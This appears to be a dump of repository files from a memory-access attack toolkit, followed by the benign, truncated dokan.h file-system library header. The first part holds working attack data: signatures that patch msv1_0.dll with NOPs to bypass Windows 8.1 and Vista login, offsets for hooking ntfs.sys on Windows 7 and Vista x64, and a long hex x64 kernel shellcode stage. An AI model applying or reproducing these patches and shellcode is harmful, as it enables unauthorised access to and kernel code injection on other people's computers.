# signature for Windows 8.1 x64 [msv1_0.dll (signed on: 2014-10-29)]
EE0,FF1542A4,EE9,0F854688,EE9,909090909090
#
# signature for Windows 8.1 x64 [msv1_0.dll (signed on: 2015-10-30)]
B60,FF15C207,B69,0F85CEBC,B69,909090909090
#
# signature for Windows 8.1 x64 [msv1_0.dll (signed on: 2016-03-16)]
F00,FF152204,F09,0F85B2B9,F09,909090909090
================================================
FILE: files/unlock_winvistax64.sig
================================================
# unlock signatures for Windows Vista x64 version
# syntax: see signature_info.txt for more information.
#
#
# signature for Windows Vista x64 [msv1_0.dll 6.0.6002.18005]
1a1,c60f85,1a8,b8,1a2,909090909090
#
# signature for Windows Vista x64 [msv1_0.dll 6.0.6002.19431]
d89,c60f85,d90,b8,d8a,909090909090
================================================
FILE: files/win7x64.kmd
================================================
# signatures for Windows 7 x64 version
#
#
# ntfs.sys signed on 2010-11-20 14:33:45 (MJ_CREATE) | (WIN7SP1-INSTALL)
7F0,488954241048894C240853565741544155415641574881EC70010000488BF248,000,C14133C24103C7468D84084F7EA86F418BC2F7D041C1C0064403C1410BC033C1,A87F0,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
#
#
# ntfs.sys signed on 2013-04-12 16:16:03 (MJ_CREATE)
680,488954241048894C240853565741544155415641574881EC70010000488BF248,940,48895C2408574883EC708B118B4104488BF9895158C1EA0389415C83E23F41B8,AA680,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
#
#
# ntfs.sys signed on 2014-01-24 04:37:56 (MJ_CREATE)
990,488954241048894C240853565741544155415641574881EC70010000488BF248,000,C14133C04133C20344240C448D8C106556ACC48BC1F7D041C1C1174503C8410B,A7990,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
#
#
# ntfs.sys signed on 2016-01-08 20:19:54 (MJ_CREATE)
BD0,488954241048894C240853565741544155415641574881EC70010000488BF248,000,C14133C24103C4428D940053144402C1C20903D18BC233C14123C233C103C346,A7BD0,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
#
#
# ntfs.sys signed on 2016-01-11 20:10:19 (MJ_CREATE)
AA0,488954241048894C240853565741544155415641574881EC70010000488BF248,000,468D8408F87CA21F8BC141C1C0104403C14133C04133C20344240C448D8C1065,A7AA0,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
#
#
# ntfs.sys [6.1.7601.23839] signed on 2017-07-09 16:32:49 (MJ_CREATE/NtfsFsdCreate)
380,488954241048894C240853565741544155415641574881EC70010000488BF248,000,03D14123C24133C04103C48D8C10B15BFFFF8B532C8B5B3CC1C1118954240841,A7380,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
#
#
# ntfs.sys [6.1.7601.23932] signed on 2017-10-17 00:07:00 (MJ_CREATE/NtfsFsdCreate)
3D0,488954241048894C240853565741544155415641574881EC70010000488BF248,000,FFFF8B532C8B5B3CC1C11189542408418BC24133C14103CA23C14133C103C246,A73D0,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
#
#
# ntfs.sys [6.1.7601.24000] signed on 2018-08-08 03:20:35 (MJ_CREATE/NtfsFsdCreate)
# ntfs.sys [6.1.7601.24335] signed on 2018-12-28 21:02:08 (MJ_CREATE/NtfsFsdCreate)
390,488954241048894C240853565741544155415641574881EC70010000488BF248,000,11906B8BC14133C3C1C2074103D323C233C14103C5468D8410937198FD418BC3,A7390,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
# ntfs.sys [6.1.7601.24382] signed on 2019-02-10 18:10:39 (MJ_CREATE/NtfsFsdCreate)
370,488954241048894C240853565741544155415641574881EC70010000488BF248,000,8bc24133c14103ca23c14133c103c2468d9c00bed75c89418bc233c141c1c316,A7370,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
================================================
FILE: files/winvistax64.kmd
================================================
# unlock signatures for Windows Vista x64 version
# syntax: see signature_info.txt for more information.
#
# NB! stage2 code differs slightly from other winx64 code (extra stack alignment around MmGetPhysicalAddress to avoid bluescreen)
#
# signature for Windows Vista x64 SP2 [ntfs.sys (signed on: 2009-04-11)]
2df,0f82b0b7,0ec,80e85efd,ae290,DEFAULT_WINX64_STAGE1,45d00,eb12000000000000000000000000000000000000584883e805505152415041510f20c15181e1fffffeff0f22c1488b15d4ffffff488910b000b201488d0dc0fffffff00fb0117522415441554883ec200f010c24488b4c2402488b4904e8b40000004883c420415d415c580f22c0415941585a59c35657488bf14833ff4833c0fcac84c07407c1cf0d03f8ebf48bc75f5ec348c1e90c48c1e10cb800100000482bc8668b01663d4d5a75ef8b413c3d0010000077e54803c18b003d5045000075d9488bc1c357568b793c8bbc39880000004803f9448b47184833f68b47204803c18b04b04803c151488bc8e885ffffff593bc2740548ffc6ebe18b57244803d14833c0668b04728b571c4803d18b04824803c15e5fc3e877ffffff4c8be0498bccbabc1e369fe89affffff48c7c10020000048c7c2ffffff7fffd04c8be84833c0b900040000ffc9498944cd0075f74d89650848b8488d05f1ffffff484989850010000048b88b004883f80074f0498985081000004155b8001000004903c5506a004883ec20498bccba026ba094e832ffffff498bcd48c7c2ffff1f004d33c04d33c9ffd04883c438498bccba5763325ae80fffffffc8200000498bcdffd0c989053efeffffc3,0,DEFAULT_WINX64_STAGE3
#
# signature for Windows Vista x64 SP2 [ntfs.sys (signed on: 2013-03-03)]
25f,0f82b0b5,08c,80e85efd,ae210,DEFAULT_WINX64_STAGE1,45d00,eb12000000000000000000000000000000000000584883e805505152415041510f20c15181e1fffffeff0f22c1488b15d4ffffff488910b000b201488d0dc0fffffff00fb0117522415441554883ec200f010c24488b4c2402488b4904e8b40000004883c420415d415c580f22c0415941585a59c35657488bf14833ff4833c0fcac84c07407c1cf0d03f8ebf48bc75f5ec348c1e90c48c1e10cb800100000482bc8668b01663d4d5a75ef8b413c3d0010000077e54803c18b003d5045000075d9488bc1c357568b793c8bbc39880000004803f9448b47184833f68b47204803c18b04b04803c151488bc8e885ffffff593bc2740548ffc6ebe18b57244803d14833c0668b04728b571c4803d18b04824803c15e5fc3e877ffffff4c8be0498bccbabc1e369fe89affffff48c7c10020000048c7c2ffffff7fffd04c8be84833c0b900040000ffc9498944cd0075f74d89650848b8488d05f1ffffff484989850010000048b88b004883f80074f0498985081000004155b8001000004903c5506a004883ec20498bccba026ba094e832ffffff498bcd48c7c2ffff1f004d33c04d33c9ffd04883c438498bccba5763325ae80fffffffc8200000498bcdffd0c989053efeffffc3,0,DEFAULT_WINX64_STAGE3
================================================
FILE: includes/dokan.h
================================================
/*
Dokan : user-mode file system library for Windows
Copyright (C) 2015 - 2019 Adrien J. <liryna.stark@gmail.com> and Maxime C. <maxime@islog.com>
Copyright (C) 2020 Google, Inc.
Copyright (C) 2007 - 2011 Hiroki Asakawa <info@dokan-dev.net>
http://dokan-dev.github.io
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU Lesser General Public License as published by the Free
Software Foundation; either version 3 of the License, or (at your option) any
later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU Lesser General Public License along
with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef DOKAN_H_
#define DOKAN_H_
/** Do not include NTSTATUS. Fix duplicate preprocessor definitions */
#define WIN32_NO_STATUS
#include <windows.h>
#undef WIN32_NO_STATUS
#include <ntstatus.h>
#include "fileinfo.h"
#include "public.h"
#ifdef _EXPORTING
/** Export dokan API see also dokan.def for export */
#define DOKANAPI __stdcall
#else
/** Import dokan API */
#define DOKANAPI __declspec(dllimport) __stdcall
#endif
/** Change calling convention to standard call */
#define DOKAN_CALLBACK __stdcall
#ifdef __cplusplus
extern "C" {
#endif
/** @file */
/**
* \defgroup Dokan Dokan
* \brief Dokan Library const and methods
*/
/** @{ */
/** The current Dokan version (200 means ver 2.0.0). \ref DOKAN_OPTIONS.Version */
#define DOKAN_VERSION 200
/** Minimum Dokan version (ver 2.0.0) accepted. */
#define DOKAN_MINIMUM_COMPATIBLE_VERSION 200
/** Driver file name including the DOKAN_MAJOR_API_VERSION */
#define DOKAN_DRIVER_NAME L"dokan" DOKAN_MAJOR_API_VERSION L".sys"
/** Network provider name including the DOKAN_MAJOR_API_VERSION */
#define DOKAN_NP_NAME L"Dokan" DOKAN_MAJOR_API_VERSION
/** @} */
/**
* \defgroup DOKAN_OPTION DOKAN_OPTION
* \brief All DOKAN_OPTION flags used in DOKAN_OPTIONS.Options
* \see DOKAN_FILE_INFO
*/
/** @{ */
/** Enable ouput debug message */
#define DOKAN_OPTION_DEBUG 1
/** Enable ouput debug message to stderr */
#define DOKAN_OPTION_STDERR (1 << 1)
/**
* Enable the use of alternate stream paths in the form
* <file-name>:<stream-name>. If this is not specified then the driver will
* fail any attempt to access a path with a colon.
*/
#define DOKAN_OPTION_ALT_STREAM (1 << 2)
/** Enable mount drive as write-protected */
#define DOKAN_OPTION_WRITE_PROTECT (1 << 3)
/** Use network drive - Dokan network provider needs to be installed */
#define DOKAN_OPTION_NETWORK (1 << 4)
/**
* Use removable drive
* Be aware that on some environments, the userland application will be denied
* to communicate with the drive which will result in a unwanted unmount.
* \see <a href="https://github.com/dokan-dev/dokany/issues/843">Issue #843</a>
*/
#define DOKAN_OPTION_REMOVABLE (1 << 5)
/**
* Use Windows Mount Manager.
* This option is highly recommended to use for better system integration
*
* If a drive letter is used but is busy, Mount manager will assign one for us and
* \ref DOKAN_OPERATIONS.Mounted parameters will contain the new mount point.
*/
#define DOKAN_OPTION_MOUNT_MANAGER (1 << 6)
/** Mount the drive on current session only */
#define DOKAN_OPTION_CURRENT_SESSION (1 << 7)
/** Enable Lockfile/Unlockfile operations. Otherwise Dokan will take care of it */
#define DOKAN_OPTION_FILELOCK_USER_MODE (1 << 8)
/**
* Enable Case sensitive path.
* By default all path are case insensitive.
* For case sensitive: \dir\File & \diR\file are different files
* but for case insensitive they are the same.
*/
#define DOKAN_OPTION_CASE_SENSITIVE (1 << 9)
/** Allows unmounting of network drive via explorer */
#define DOKAN_OPTION_ENABLE_UNMOUNT_NETWORK_DRIVE (1 << 10)
/**
* Forward the kernel driver global and volume logs to the userland.
* Can be very slow if single thread is enabled.
*/
#define DOKAN_OPTION_DISPATCH_DRIVER_LOGS (1 << 11)
/** @} */
typedef VOID *DOKAN_HANDLE, **PDOKAN_HANDLE;
/**
* \struct DOKAN_OPTIONS
* \brief Dokan mount options used to describe Dokan device behavior.
* \see DokanMain
*/
typedef struct _DOKAN_OPTIONS {
/** Version of the Dokan features requested without dots (version "123" is equal to Dokan version 1.2.3). */
USHORT Version;
/** Only use a single thread to process events. This is highly not recommended as can easily create a bottleneck. */
BOOLEAN SingleThread;
/** Features enabled for the mount. See \ref DOKAN_OPTION. */
ULONG Options;
/** FileSystem can store anything here. */
ULONG64 GlobalContext;
/** Mount point. It can be a driver letter like "M:\" or a folder path "C:\mount\dokan" on a NTFS partition. */
LPCWSTR MountPoint;
/**
* UNC Name for the Network Redirector
* \see <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff556761(v=vs.85).aspx">Support for UNC Naming</a>
*/
LPCWSTR UNCName;
/**
* Max timeout in milliseconds of each request before Dokan gives up to wait events to complete.
* A timeout request is a sign that the userland implementation is no longer able to properly manage requests in time.
* The driver will therefore unmount the device when a timeout trigger in order to keep the system stable.
* The default timeout value is 15 seconds.
*/
ULONG Timeout;
/** Allocation Unit Size of the volume. This will affect the file size. */
ULONG AllocationUnitSize;
/** Sector Size of the volume. This will affect the file size. */
ULONG SectorSize;
/** Length of the optional VolumeSecurityDescriptor provided. Set 0 will disable the option. */
ULONG VolumeSecurityDescriptorLength;
/** Optional Volume Security descriptor. See <a href="https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-initializesecuritydescriptor">InitializeSecurityDescriptor</a> */
CHAR VolumeSecurityDescriptor[VOLUME_SECURITY_DESCRIPTOR_MAX_SIZE];
} DOKAN_OPTIONS, *PDOKAN_OPTIONS;
/**
* \struct DOKAN_FILE_INFO
* \brief Dokan file information on the current operation.
*/
typedef struct _DOKAN_FILE_INFO {
/**
* Context that can be used to carry information between operations.
* The context can carry whatever type like \c HANDLE, struct, int,
* internal reference that will help the implementation understand the request context of the event.
*/
ULONG64 Context;
/** Reserved. Used internally by Dokan library. Never modify. */
ULONG64 DokanContext;
/** A pointer to DOKAN_OPTIONS which was passed to \ref DokanMain or \ref DokanCreateFileSystem. */
PDOKAN_OPTIONS DokanOptions;
/**
* Reserved. Used internally by Dokan library. Never modify.
* If the processing for the event requires extra data to be associated with it
* then a pointer to that data can be placed here
*/
PVOID ProcessingContext;
/**
* Process ID for the thread that originally requested a given I/O operation.
*/
ULONG ProcessId;
/**
* Requesting a directory file.
* Must be set in \ref DOKAN_OPERATIONS.ZwCreateFile if the file appears to be a folder.
*/
UCHAR IsDirectory;
/** Flag if the file has to be deleted during DOKAN_OPERATIONS. Cleanup event. */
UCHAR DeleteOnClose;
/** Read or write is paging IO. */
UCHAR PagingIo;
/** Read or write is synchronous IO. */
UCHAR SynchronousIo;
/** Read or write directly from data source without cache */
UCHAR Nocache;
/** If \c TRUE, write to the current end of file instead of using the Offset parameter. */
UCHAR WriteToEndOfFile;
} DOKAN_FILE_INFO, *PDOKAN_FILE_INFO;
#define DOKAN_EXCEPTION_NOT_INITIALIZED 0x0f0ff0ff
#define DOKAN_EXCEPTION_INITIALIZATION_FAILED 0x0fbadbad
#define DOKAN_EXCEPTION_SHUTDOWN_FAILED 0x0fbadf00
/**
* \brief FillFindData Used to add an entry in FindFiles operation
* \return 1 if buffer is full, otherwise 0 (currently it never returns 1)
*/
typedef int(WINAPI *PFillFindData)(PWIN32_FIND_DATAW, PDOKAN_FILE_INFO);
/**
* \brief FillFindStreamData Used to add an entry in FindStreams
* \return FALSE if the buffer is full, otherwise TRUE
*/
typedef BOOL(WINAPI *PFillFindStreamData)(PWIN32_FIND_STREAM_DATA, PVOID);
// clang-format off
/**
* \struct DOKAN_OPERATIONS
* \brief Dokan API callbacks interface
*
* DOKAN_OPERATIONS is a struct of callbacks that describe all Dokan API operations
* that will be called when Windows access to the filesystem.
*
* If an error occurs, return NTSTATUS (https://support.microsoft.com/en-us/kb/113996).
* Win32 Error can be converted to \c NTSTATUS with \ref DokanNtStatusFromWin32
*
* All callbacks can be set to \c NULL or return \c STATUS_NOT_IMPLEMENTED
* if supporting one of them is not desired. Be aware that returning such values to important callbacks
* such as DOKAN_OPERATIONS.ZwCreateFile / DOKAN_OPERATIONS.ReadFile / ... would make the filesystem not work or become unstable.
*/
typedef struct _DOKAN_OPERATIONS {
/**
* \brief CreateFile Dokan API callback
*
* CreateFile is called each time a request is made on a file system object.
*
* In case \c OPEN_ALWAYS & \c CREATE_ALWAYS are successfully opening an
* existing file, \c STATUS_OBJECT_NAME_COLLISION should be returned instead of \c STATUS_SUCCESS .
* This will inform Dokan that the file has been opened and not created during the request.
*
* If the file is a directory, CreateFile is also called.
* In this case, CreateFile should return \c STATUS_SUCCESS when that directory
* can be opened and DOKAN_FILE_INFO.IsDirectory has to be set to \c TRUE.
* On the other hand, if DOKAN_FILE_INFO.IsDirectory is set to \c TRUE
* but the path targets a file, \c STATUS_NOT_A_DIRECTORY must be returned.
*
* DOKAN_FILE_INFO.Context can be used to store Data (like \c HANDLE)
* that can be retrieved in all other requests related to the Context.
* To avoid memory leak, Context needs to be released in DOKAN_OPERATIONS.Cleanup.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param SecurityContext SecurityContext, see https://msdn.microsoft.com/en-us/library/windows/hardware/ff550613(v=vs.85).aspx
* \param DesiredAccess Specifies an <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff540466(v=vs.85).aspx">ACCESS_MASK</a> value that determines the requested access to the object.
* \param FileAttributes Specifies one or more FILE_ATTRIBUTE_XXX flags, which represent the file attributes to set if a file is created or overwritten.
* \param ShareAccess Type of share access, which is specified as zero or any combination of FILE_SHARE_* flags.
* \param CreateDisposition Specifies the action to perform if the file does or does not exist.
* \param CreateOptions Specifies the options to apply when the driver creates or opens the file.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff566424(v=vs.85).aspx">See ZwCreateFile for more information about the parameters of this callback (MSDN).</a>
* \see DokanMapKernelToUserCreateFileFlags
*/
NTSTATUS(DOKAN_CALLBACK *ZwCreateFile)(LPCWSTR FileName,
PDOKAN_IO_SECURITY_CONTEXT SecurityContext,
ACCESS_MASK DesiredAccess,
ULONG FileAttributes,
ULONG ShareAccess,
ULONG CreateDisposition,
ULONG CreateOptions,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief Cleanup Dokan API callback
*
* Cleanup request before \ref CloseFile is called.
*
* When DOKAN_FILE_INFO.DeleteOnClose is \c TRUE, the file in Cleanup must be deleted.
* The function cannot fail therefore the filesystem need to ensure ahead
* that a the delete can safely happen during Cleanup.
* See DeleteFile documentation for explanation.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param DokanFileInfo Information about the file or directory.
* \see DeleteFile
* \see DeleteDirectory
*/
void(DOKAN_CALLBACK *Cleanup)(LPCWSTR FileName,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief CloseFile Dokan API callback
*
* Clean remaining Context
*
* CloseFile is called at the end of the life of the context.
* Anything remaining in \ref DOKAN_FILE_INFO.Context must be cleared before returning.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param DokanFileInfo Information about the file or directory.
*/
void(DOKAN_CALLBACK *CloseFile)(LPCWSTR FileName,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief ReadFile Dokan API callback
*
* ReadFile callback on the file previously opened in DOKAN_OPERATIONS.ZwCreateFile.
* It can be called by different threads at the same time, so the read/context has to be thread safe.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param Buffer Read buffer that has to be filled with the read result.
* \param BufferLength Buffer length and read size to continue with.
* \param ReadLength Total data size that has been read.
* \param Offset Offset from where the read has to be continued.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see WriteFile
*/
NTSTATUS(DOKAN_CALLBACK *ReadFile)(LPCWSTR FileName,
LPVOID Buffer,
DWORD BufferLength,
LPDWORD ReadLength,
LONGLONG Offset,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief WriteFile Dokan API callback
*
* WriteFile callback on the file previously opened in DOKAN_OPERATIONS.ZwCreateFile
* It can be called by different threads at the same time, sp the write/context has to be thread safe.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param Buffer Data that has to be written.
* \param NumberOfBytesToWrite Buffer length and write size to continue with.
* \param NumberOfBytesWritten Total number of bytes that have been written.
* \param Offset Offset from where the write has to be continued.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see ReadFile
*/
NTSTATUS(DOKAN_CALLBACK *WriteFile)(LPCWSTR FileName,
LPCVOID Buffer,
DWORD NumberOfBytesToWrite,
LPDWORD NumberOfBytesWritten,
LONGLONG Offset,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief FlushFileBuffers Dokan API callback
*
* Clears buffers for this context and causes any buffered data to be written to the file.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
*/
NTSTATUS(DOKAN_CALLBACK *FlushFileBuffers)(LPCWSTR FileName,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief GetFileInformation Dokan API callback
*
* Get specific information on a file.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param Buffer BY_HANDLE_FILE_INFORMATION struct to fill.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
*/
NTSTATUS(DOKAN_CALLBACK *GetFileInformation)(LPCWSTR FileName,
LPBY_HANDLE_FILE_INFORMATION Buffer,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief FindFiles Dokan API callback
*
* List all files in the requested path
* \ref DOKAN_OPERATIONS.FindFilesWithPattern is checked first. If it is not implemented or
* returns \c STATUS_NOT_IMPLEMENTED, then FindFiles is called, if implemented.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param FillFindData Callback that has to be called with PWIN32_FIND_DATAW that contain file information.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see FindFilesWithPattern
*/
NTSTATUS(DOKAN_CALLBACK *FindFiles)(LPCWSTR FileName,
PFillFindData FillFindData,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief FindFilesWithPattern Dokan API callback
*
* Same as \ref DOKAN_OPERATIONS.FindFiles but with a search pattern.\n
* The search pattern is a Windows MS-DOS-style expression.
* It can contain wild cards and extended characters or none of them. See \ref DokanIsNameInExpression.
*
* If the function is not implemented, \ref DOKAN_OPERATIONS.FindFiles
* will be called instead and the result will be filtered internally by the library.
*
* \param PathName Path requested by the Kernel on the FileSystem.
* \param SearchPattern Search pattern.
* \param FillFindData Callback that has to be called with PWIN32_FIND_DATAW that contains file information.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see FindFiles
* \see DokanIsNameInExpression
*/
NTSTATUS(DOKAN_CALLBACK *FindFilesWithPattern)(LPCWSTR PathName,
LPCWSTR SearchPattern,
PFillFindData FillFindData,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief SetFileAttributes Dokan API callback
*
* Set file attributes on a specific file
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param FileAttributes FileAttributes to set on file.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
*/
NTSTATUS(DOKAN_CALLBACK *SetFileAttributes)(LPCWSTR FileName,
DWORD FileAttributes,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief SetFileTime Dokan API callback
*
* Set file attributes on a specific file
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param CreationTime Creation FILETIME.
* \param LastAccessTime LastAccess FILETIME.
* \param LastWriteTime LastWrite FILETIME.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
*/
NTSTATUS(DOKAN_CALLBACK *SetFileTime)(LPCWSTR FileName,
CONST FILETIME *CreationTime,
CONST FILETIME *LastAccessTime,
CONST FILETIME *LastWriteTime,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief DeleteFile Dokan API callback
*
* Check if it is possible to delete a file.
*
* DeleteFile will also be called with DOKAN_FILE_INFO.DeleteOnClose set to \c FALSE
* to notify the driver when the file is no longer requested to be deleted.
*
* The file in DeleteFile should not be deleted, but instead the file
* must be checked as to whether or not it can be deleted,
* and \c STATUS_SUCCESS should be returned (when it can be deleted) or
* appropriate error codes, such as \c STATUS_ACCESS_DENIED or
* \c STATUS_OBJECT_NAME_NOT_FOUND, should be returned.
*
* When \c STATUS_SUCCESS is returned, a Cleanup call is received afterwards with
* DOKAN_FILE_INFO.DeleteOnClose set to \c TRUE. Only then must the closing file
* be deleted.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see DeleteDirectory
* \see Cleanup
*/
NTSTATUS(DOKAN_CALLBACK *DeleteFile)(LPCWSTR FileName,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief DeleteDirectory Dokan API callback
*
* Check if it is possible to delete a directory.
*
* DeleteDirectory will also be called with DOKAN_FILE_INFO.DeleteOnClose set to \c FALSE
* to notify the driver when the file is no longer requested to be deleted.
*
* The Directory in DeleteDirectory should not be deleted, but instead
* must be checked as to whether or not it can be deleted,
* and \c STATUS_SUCCESS should be returned (when it can be deleted) or
* appropriate error codes, such as \c STATUS_ACCESS_DENIED,
* \c STATUS_OBJECT_PATH_NOT_FOUND, or \c STATUS_DIRECTORY_NOT_EMPTY, should
* be returned.
*
* When \c STATUS_SUCCESS is returned, a Cleanup call is received afterwards with
* DOKAN_FILE_INFO.DeleteOnClose set to \c TRUE. Only then must the closing file
* be deleted.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or \c NTSTATUS appropriate to the request result.
* \ref DeleteFile
* \ref Cleanup
*/
NTSTATUS(DOKAN_CALLBACK *DeleteDirectory)(LPCWSTR FileName,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief MoveFile Dokan API callback
*
* Move a file or directory to a new destination
*
* \param FileName Path for the file to be moved.
* \param NewFileName Path for the new location of the file.
* \param ReplaceIfExisting If destination already exists, can it be replaced?
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
*/
NTSTATUS(DOKAN_CALLBACK *MoveFile)(LPCWSTR FileName,
LPCWSTR NewFileName,
BOOL ReplaceIfExisting,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief SetEndOfFile Dokan API callback
*
* SetEndOfFile is used to truncate or extend a file (physical file size).
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param ByteOffset File length to set.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
*/
NTSTATUS(DOKAN_CALLBACK *SetEndOfFile)(LPCWSTR FileName,
LONGLONG ByteOffset,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief SetAllocationSize Dokan API callback
*
* SetAllocationSize is used to truncate or extend a file.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param AllocSize File length to set.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
*/
NTSTATUS(DOKAN_CALLBACK *SetAllocationSize)(LPCWSTR FileName,
LONGLONG AllocSize,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief LockFile Dokan API callback
*
* Lock file at a specific offset and data length.
* This is only used if \ref DOKAN_OPTION_FILELOCK_USER_MODE is enabled.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param ByteOffset Offset from where the lock has to be continued.
* \param Length Data length to lock.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see UnlockFile
*/
NTSTATUS(DOKAN_CALLBACK *LockFile)(LPCWSTR FileName,
LONGLONG ByteOffset,
LONGLONG Length,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief UnlockFile Dokan API callback
*
* Unlock file at a specific offset and data length.
* This is only used if \ref DOKAN_OPTION_FILELOCK_USER_MODE is enabled.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param ByteOffset Offset from where the lock has to be continued.
* \param Length Data length to lock.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see LockFile
*/
NTSTATUS(DOKAN_CALLBACK *UnlockFile)(LPCWSTR FileName,
LONGLONG ByteOffset,
LONGLONG Length,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief GetDiskFreeSpace Dokan API callback
*
* Retrieves information about the amount of space that is available on a disk volume.
* It consits of the total amount of space, the total amount of free space, and
* the total amount of free space available to the user that is associated with the calling thread.
*
* Neither GetDiskFreeSpace nor \ref GetVolumeInformation
* save the DOKAN_FILE_INFO.Context.
* Before these methods are called, \ref ZwCreateFile may not be called.
* (ditto \ref CloseFile and \ref Cleanup)
*
* \param FreeBytesAvailable Amount of available space.
* \param TotalNumberOfBytes Total size of storage space
* \param TotalNumberOfFreeBytes Amount of free space
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or \c NTSTATUS appropriate to the request result.
* \see <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa364937(v=vs.85).aspx"> GetDiskFreeSpaceEx function (MSDN)</a>
* \see GetVolumeInformation
*/
NTSTATUS(DOKAN_CALLBACK *GetDiskFreeSpace)(PULONGLONG FreeBytesAvailable,
PULONGLONG TotalNumberOfBytes,
PULONGLONG TotalNumberOfFreeBytes,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief GetVolumeInformation Dokan API callback
*
* Retrieves information about the file system and volume associated with the specified root directory.
*
* Neither GetVolumeInformation nor GetDiskFreeSpace
* save the \ref DOKAN_FILE_INFO#Context.
* Before these methods are called, \ref ZwCreateFile may not be called.
* (ditto \ref CloseFile and \ref Cleanup)
*
* VolumeName length can be anything that fit in the provided buffer.
* But some Windows component expect it to be no longer than 32 characters
* that why it is recommended to set a value under this limit.
*
* FileSystemName could be anything up to 10 characters.
* But Windows check few feature availability based on file system name.
* For this, it is recommended to set NTFS or FAT here.
*
* \c FILE_READ_ONLY_VOLUME is automatically added to the
* FileSystemFlags if \ref DOKAN_OPTION_WRITE_PROTECT was
